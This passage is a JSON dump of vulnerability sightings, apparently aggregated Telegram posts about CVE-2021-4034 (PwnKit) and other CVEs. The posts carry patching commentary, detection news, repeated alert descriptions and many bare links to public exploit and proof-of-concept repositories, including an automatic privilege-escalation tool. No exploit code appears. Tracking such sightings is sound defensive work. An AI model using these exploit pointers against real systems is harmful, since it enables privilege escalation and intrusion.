\u043f\u043e\u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e. \u0418\u0437 \u0433\u0440\u043e\u043c\u043a\u0438\u0445 \u043c\u043e\u0436\u043d\u043e \u0435\u0449\u0451 \u0432\u0441\u043f\u043e\u043c\u043d\u0438\u0442\u044c Dirty Cow (CVE-2016-5195 - \u043e\u0431\u0430\u043b\u0434\u0435\u0442\u044c \ud83d\ude31, 6 \u043b\u0435\u0442 \u043d\u0430\u0437\u0430\u0434, \u043f\u043e\u043c\u043d\u044e \u043a\u0430\u043a \u0432\u0447\u0435\u0440\u0430 \u043a\u0430\u043a \u0442\u0435\u0441\u0442\u0438\u043b) \u0438 Qualys-\u043e\u0432\u0441\u043a\u0438\u0435 PwnKit (CVE-2021-4034) \u0438 Sequoia (CVE-2021-33909).\n\n\u0410 \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0442\u044c? \u0418\u043c\u0445\u043e, \u043f\u0430\u0442\u0447\u0438\u0442\u044c. \u041b\u0443\u0447\u0448\u0435 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430, \u0430 \u043d\u0435 \u0432 \u043f\u043e\u0436\u0430\u0440\u043d\u043e\u043c \u0440\u0435\u0436\u0438\u043c\u0435. \u041d\u043e \u0435\u0441\u043b\u0438 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0438\u043d\u0433\u0430 Linux-\u043e\u0432 \u043d\u0435\u0442, \u0442\u043e \u043b\u0443\u0447\u0448\u0435 \u0440\u0430\u0437\u043e\u0432\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f, \u043c\u0430\u0445\u0430\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e (\u0438\u043b\u0438 \u0434\u0430\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 \u0441\u0442\u0430\u0440\u044b\u043c\u0438 \u0441 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u043c\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430\u043c\u0438) \u043a\u0430\u043a \u0444\u043b\u0430\u0433\u043e\u043c. \u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0437\u043e\u0432\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0436\u043d\u0435\u043d\u0438\u044f \u0431\u0443\u0434\u0435\u0442 \u0432\u0438\u0434\u043d\u043e \u043a\u0430\u043a\u0438\u0435 \u0435\u0441\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435\u043c \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430, \u0430 \u0433\u0434\u0435-\u0442\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0441\u044f \u0435\u0433\u043e \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c \u0441 \u043d\u0430\u0441\u043a\u043e\u043a\u0430.\n\n\u041d\u0443 \u0438\u043b\u0438 \u043c\u043e\u0436\u043d\u043e \u043d\u0435 \u043f\u0430\u0442\u0447\u0438\u0442\u044c, \u043e\u0431\u043e\u0441\u043d\u043e\u0432\u044b\u0432\u0430\u044f \u0442\u0435\u043c, \u0447\u0442\u043e \u043e\u043d\u043e (\u0432\u0440\u043e\u0434\u0435) \u043d\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0431\u0435\u043b\u044c\u043d\u043e, \u0430 \u0433\u0434\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0431\u0435\u043b\u044c\u043d\u043e, \u0442\u043e \u0442\u0430\u043c \u043d\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e \u0438\u043b\u0438 \u0442\u0443\u0434\u0430 \u043d\u0435 \u0434\u043e\u0431\u0435\u0440\u0443\u0442\u0441\u044f. \u0418 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u043d\u0435 \u0432\u044b\u0431\u0435\u0440\u0443\u0442\u0441\u044f. \u0418 \u0432\u043e\u043e\u0431\u0449\u0435 \u043c\u043e\u0436\u043d\u043e \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c EDR \u043d\u0430 \u043b\u0438\u043d\u0443\u043a\u0441\u0430\u0445. \u0418 \u0435\u0449\u0451 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u043c\u0430\u043d\u0434\u0430\u0442\u043a\u0443 \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c. \n\n\u041d\u043e, \u0438\u043c\u0445\u043e, \u043e\u0446\u0435\u043d\u043a\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0431\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438, \u0445\u0430\u0440\u0434\u0435\u043d\u0438\u043d\u0433 \u0438 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435 \u0421\u0417\u0418 \u0434\u043b\u044f Linux-\u043e\u0432 \u044d\u0442\u043e \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0432\u0441\u0435 \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u043d\u043e \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0435 \u044d\u0442\u043e \u043f\u0430\u0442\u0447\u0438\u043d\u0433 \u0438 \u043f\u0440\u0435\u0436\u0434\u0435 \u0432\u0441\u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0438\u043c\u0435\u043d\u043d\u043e \u0441 \u043d\u0438\u043c. \n\n@avleonovrus #Linux #Kernel #EOP #DirtyCred", "creation_timestamp": "2023-09-21T09:19:24.000000Z"}, {"uuid": "a5556586-313c-4c34-969c-cde5cb83a4d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/alexmakus/4531", "content": "\u0442\u0443\u0442 \u0435\u0449\u0435 \u043f\u043e\u0434\u043e\u0433\u043d\u0430\u043b \u0447\u0438\u0442\u0430\u0442\u0435\u043b\u044c \u0442\u0435\u043c\u0443 \u043f\u0440\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Linux \u2014\u00a0\u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 polkit, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \"\u0431\u0435\u0441\u043f\u0440\u0430\u0432\u043d\u043e\u043c\u0443\" \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0435\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u0440\u0443\u0442\u043e\u0432\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u043c\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. Polkit \u2014\u00a0\u044d\u0442\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438, \u043f\u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u0431\u0435\u0437 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u0449\u0438\u0445 \u043f\u0440\u0430\u0432 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0442 \u0441 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u043c\u0438, \u0443 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0435\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0430. \n\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034\n\nhttps://access.redhat.com/security/cve/CVE-2021-4034", "creation_timestamp": "2022-01-26T18:54:32.000000Z"}, {"uuid": "847f3f99-c872-43a2-acb8-56211a23ccf7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/ctinow/46812", "content": "Detecting PwnKit (CVE-2021-4034) Using Trend Micro\u2122 Vision One\u2122 and Cloud One\u2122\n\nhttps://ift.tt/GYzCcfD", "creation_timestamp": "2022-02-11T13:56:39.000000Z"}, {"uuid": "ea41bf84-4bd8-4129-b9ef-6f9255441028", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/oVcniz68DfbMprQYR7QmucLiyBS8RLgqW32--GZ8nhssCw", "content": "", "creation_timestamp": "2024-01-11T02:14:52.000000Z"}, {"uuid": "e3241da9-468c-4c7a-b247-0645e3d6e61e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/ctinow/45794", "content": "PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit\u2019s pkexec (CVE-2021-4034)\n\nhttps://ift.tt/3IEN1xE", "creation_timestamp": "2022-01-25T18:42:48.000000Z"}, {"uuid": "59272be9-06d5-4d7d-bf26-9983623c81b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/arpsyndicate/183", "content": "#ExploitObserverAlert\n\nCVE-2021-4034\n\nDESCRIPTION: Exploit Observer has 525 entries related to CVE-2021-4034. A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.\n\nFIRST-EPSS: 0.000460000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-17T02:50:22.000000Z"}, {"uuid": "e42a5eae-8690-4263-bd23-a400b80faaa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/EidKnczSSqyjBcQ7sKuQ5Eq9NVHE7CjrCRWQNDH8CB5oRZc", "content": "", "creation_timestamp": "2024-04-24T17:42:10.000000Z"}, {"uuid": "fa278449-a416-4902-8847-05bc3d69a4dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/arpsyndicate/2024", "content": "#ExploitObserverAlert\n\nCVE-2021-4034\n\nDESCRIPTION: Exploit Observer has 535 entries related to CVE-2021-4034. A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.\n\nFIRST-EPSS: 0.000460000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-18T16:37:52.000000Z"}, {"uuid": "69d543bd-bc4a-46fa-b1e9-37f9c9a06480", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/arpsyndicate/875", "content": "#ExploitObserverAlert\n\nCVE-2021-4034\n\nDESCRIPTION: Exploit Observer has 532 entries related to CVE-2021-4034. A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.\n\nFIRST-EPSS: 0.000460000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-02T01:37:47.000000Z"}, {"uuid": "1bee9cea-9696-43a5-ba64-1a2f199cd025", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/arpsyndicate/1589", "content": "#ExploitObserverAlert\n\nCVE-2021-4034\n\nDESCRIPTION: Exploit Observer has 535 entries related to CVE-2021-4034. A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.\n\nFIRST-EPSS: 0.000460000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-10T01:07:36.000000Z"}, {"uuid": "6840f9c2-7eae-4821-b2bc-cc0ce08c7a54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/arpsyndicate/295", "content": "#ExploitObserverAlert\n\nCVE-2021-4034\n\nDESCRIPTION: Exploit Observer has 532 entries related to CVE-2021-4034. A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.\n\nFIRST-EPSS: 0.000460000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-20T15:43:45.000000Z"}, {"uuid": "767cbfb1-27c8-44b2-977c-b97e033da550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/pt_hat/128", "content": "https://github.com/berdav/CVE-2021-4034", "creation_timestamp": "2023-08-10T10:37:49.000000Z"}, {"uuid": "4c76747f-7695-42bb-8137-dd29384fe8c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/LockBitRaasRansomware/22829", "content": "Traitor - Exploit Low-Hanging Fruit Automatically\n\n\ud83c\udfa9 Nearly all of GTFOBins\n\ud83c\udfa9 Writeable docker.sock\n\ud83c\udfa9 CVE-2022-0847 (Dirty pipe)\n\ud83c\udfa9 CVE-2021-4034 (pwnkit)\n\ud83c\udfa9 CVE-2021-3560\n\n\nhttps://github.com/liamg/traitor", "creation_timestamp": "2024-04-24T17:42:11.000000Z"}, {"uuid": "1d9e42e5-7dab-4fe2-881a-efa9ae8bdc8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/ggL6AH1lRYorBCzgwro177IArqCXjxjkyvjAx2FEfC3c0Ls", "content": "", "creation_timestamp": "2025-04-13T23:00:06.000000Z"}, {"uuid": "b193a599-bbd4-480f-879e-681571362237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/CIVNn89GDUIs4ZbFkMz6iekloDpSEBthk-mv-jAbmebdFGA", "content": "", "creation_timestamp": "2025-01-28T04:00:07.000000Z"}, {"uuid": "c9d13a3c-b3de-44fe-97bf-e63c7c3ebfd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/ARC15INFO/355", "content": "#c_lang \n\nhttps://github.com/PwnFunction/CVE-2021-4034", "creation_timestamp": "2024-08-29T06:29:08.000000Z"}, {"uuid": "362d01bf-007e-43f6-8b53-31c1b5e57679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/Et5iVFSCdUPdUHeaaqlJJet8Ug6v7OSAbBycvWTpNUP7fWw", "content": "", "creation_timestamp": "2025-02-24T22:00:05.000000Z"}, {"uuid": "2f19b169-a924-4aef-8cfe-98a9f8ddfd12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/3136", "content": "Traitor - Exploit Low-Hanging Fruit Automatically\n\n\ud83c\udfa9 Nearly all of GTFOBins\n\ud83c\udfa9 Writeable docker.sock\n\ud83c\udfa9 CVE-2022-0847 (Dirty pipe)\n\ud83c\udfa9 CVE-2021-4034 (pwnkit)\n\ud83c\udfa9 CVE-2021-3560\n\n\nhttps://github.com/liamg/traitor", "creation_timestamp": "2023-09-26T19:41:26.000000Z"}, {"uuid": "612fbb91-c43d-4b22-9cf2-dd30e038a113", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "Telegram/oFSJa4mQMTwhHRgGjWaZGXG4qtiHsmXGoJV729fA5D0l", "content": "", "creation_timestamp": "2022-08-15T05:51:10.000000Z"}, {"uuid": "aae4aee9-9bb6-4fbe-bbc6-4521a510a1a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/QValaaFo3uPGrlDiprc88NpVsfmNQ6cxZha1ytjV5Zs", "content": "", "creation_timestamp": "2024-12-13T08:04:13.000000Z"}, {"uuid": "3c6f53e4-a276-4ca9-a2e1-a42c536ea28d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/YThhENXyfL9N5zILxL4YkwkohoZV8jH95dLJU3RWBNEcxT64", "content": "", "creation_timestamp": "2022-02-02T00:46:57.000000Z"}, {"uuid": "311b9f18-de9d-4bfb-ab1c-b48f0c5b89b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/hack_room_channel/177", "content": "https://github.com/ly4k/PwnKit\n\n#(CVE-2021-4034) #Exploit #POC", "creation_timestamp": "2022-01-27T09:28:34.000000Z"}, {"uuid": "f6aea869-9037-420c-8efe-327088b2bba8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/proxy_bar/953", "content": "Shikitega\n\u041d\u043e\u0432\u0430\u044f \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u043f\u043e\u0434 Linux (\u0445\u043e\u0442\u044f \u044e\u0437\u0430\u0435\u0442 \u0441\u043f\u043b\u043e\u0438\u0442\u044b \u043d\u0435 \u043d\u043e\u0432\u044b\u0435: \u0437\u0430\u0431\u0440\u0430\u0442\u044c \u0442\u0443\u0442 CVE-2021-4034 \u0438 CVE-2021-3493)\n*\n\u0410 \u0446\u0435\u043b\u043e\u043c \u043d\u0438\u0447\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e, \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u0431\u0438\u0432 \u043f\u043e \u043a\u0440\u043e\u043d\u0443 \u043c\u0430\u0439\u043d\u0435\u0440 XMR (\u043d\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u043d\u0435 \u0432\u0441\u0435 \u043f\u0440\u0438\u043b\u0435\u0442\u0435\u043b\u043e \u0441 C&C srv )\n\u0412 \u043e\u0431\u0449\u0435\u043c \u0432\u043e\u0442 \u0445\u043e\u0440\u043e\u0448\u0438\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0434\u043b\u044f \"\u043c\u044b\u043b\u043e\u0432\u0430\u0440\u043e\u0432\", \u043d\u043e \u0432 \u0446\u0435\u043b\u043e\u043c \u0435\u0441\u043b\u0438 \u043f\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u043a\u0430\u043a\u0438\u0435 CVE \u044e\u0437\u0430\u0435\u0442 \u0438 \u043a\u0430\u043a\u0438\u0435 payload \u0437\u0430\u043a\u0438\u0434\u044b\u0432\u0430\u0435\u0442 \u0434\u0440\u043e\u043f\u043f\u0435\u0440 - \u044f\u0441\u043d\u043e \u0447\u0442\u043e \u043b\u044e\u0434\u0438 \u0432 patch \u043d\u0435 \u0443\u043c\u0435\u044e\u0442\\\u043d\u0435\u0445\u043e\u0442\u044f\u0442 \u043d\u043e \u0431\u0435\u043b\u044b\u0439 IP \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0435 \u0438\u043c\u0435\u044e\u0442.\n*\n\u0418\u041d\u0442\u0435\u0440\u0435\u0441\u043d\u0430 \u0441\u043a\u043e\u0440\u0435\u0435 \u0442\u0435\u0445\u043d\u0438\u043a\u0430 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 - \u0432 \u043e\u0431\u0449\u0435\u043c \u0432\u043e\u0442 \u0447\u0438\u0442\u0430\u0435\u043c\n\n#malware #linux #exploit #miner", "creation_timestamp": "2022-09-06T19:10:01.000000Z"}, {"uuid": "59365162-6fdd-4c83-8508-78ca964f3f86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/VhzYQMHwSU7mGtOQ1RUgux6T8qmhegj2FbJX4InosYYiZw", "content": "", "creation_timestamp": "2022-01-30T19:25:31.000000Z"}, {"uuid": "feef74e1-df8e-4013-adb2-312cd5c99643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/intelexch/7691", "content": "https://github.com/n3onhacks/CVE-2021-4034-BASH-One-File-Exploit", "creation_timestamp": "2022-01-28T15:55:45.000000Z"}, {"uuid": "dafe0ed3-8b46-4612-b0b9-ee16436a4fc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/RESOLUTEATTACK/285", "content": "\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043e\u0431 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e CVE-2021-4034 aka Pwnkit\n\nCORS | E7PENTEST SUBSCRIBE\n\n#\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 #CVE", "creation_timestamp": "2023-01-05T21:50:23.000000Z"}, {"uuid": "59baf3a9-f638-4e8c-9664-b12e8ade5c72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/218", "content": "Simple Serv-U CVE-2021-35211 #poc\nhttps://github.com/NattiSamson/Serv-U-CVE-2021-35211\n\nCVE-2021-40346 integer overflow enables http smuggling\nhttps://github.com/donky16/CVE-2021-40346-POC\n\nPOC for CVE-2021-31166: Windows HTTP\nhttps://github.com/antx-code/CVE-2021-31166\n\nOffensive RPC #poc\nhttps://github.com/sensepost/offensive-rpc\n\nSimple Serv-U CVE-2021-35211 #poc\nhttps://github.com/5gstudent/CVE-2021-22005-\n\nios-nehelper-wifi-info-0day #exploit\nhttps://github.com/illusionofchaos/ios-nehelper-wifi-info-0day\nhttps://github.com/illusionofchaos/ios-nehelper-enum-apps-0day\n\n#poc for CVE-2021-3129 (Laravel)\nhttps://github.com/knqyf263/CVE-2021-3129", "creation_timestamp": "2021-10-01T18:29:21.000000Z"}, {"uuid": "b3d9606d-3a4b-48af-94cb-6ca5b03070e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/181", "content": "Latest Vulnerabilities and Exploits\n\n1_ ProxyShell \n_ https://github.com/ktecv2000/ProxyShell\n_ https://github.com/dmaasland/proxyshell-poc\n_ https://github.com/Udyz/proxyshell-auto\n\n2_ proxylogon\nhttps://github.com/Udyz/Automatic-Proxylogon-Exploit\n\n3_ HAProxy HTTP Smuggling\nhttps://github.com/knqyf263/CVE-2021-40346\n\n4_ Sequoia PoC\nhttps://github.com/ChrisTheCoolHut/CVE-2021-33909\n\n5_ RCE 0-day for GhostScript 9.50\nhttps://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50\n\n6_ CVE-2021-26084:\nConfluence Server Webwork OGNL Injection\nhttps://github.com/alt3kx/CVE-2021-26084_PoC\n\nRCE PoC:\nhttps://github.com/FanqXu/CVE-2021-26084", "creation_timestamp": "2021-09-10T14:07:22.000000Z"}, {"uuid": "e1bee12a-0d26-469e-a2e9-fc57b5ff6305", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "exploited", "source": "https://t.me/true_secator/6124", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u041b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0443 \u043f\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c 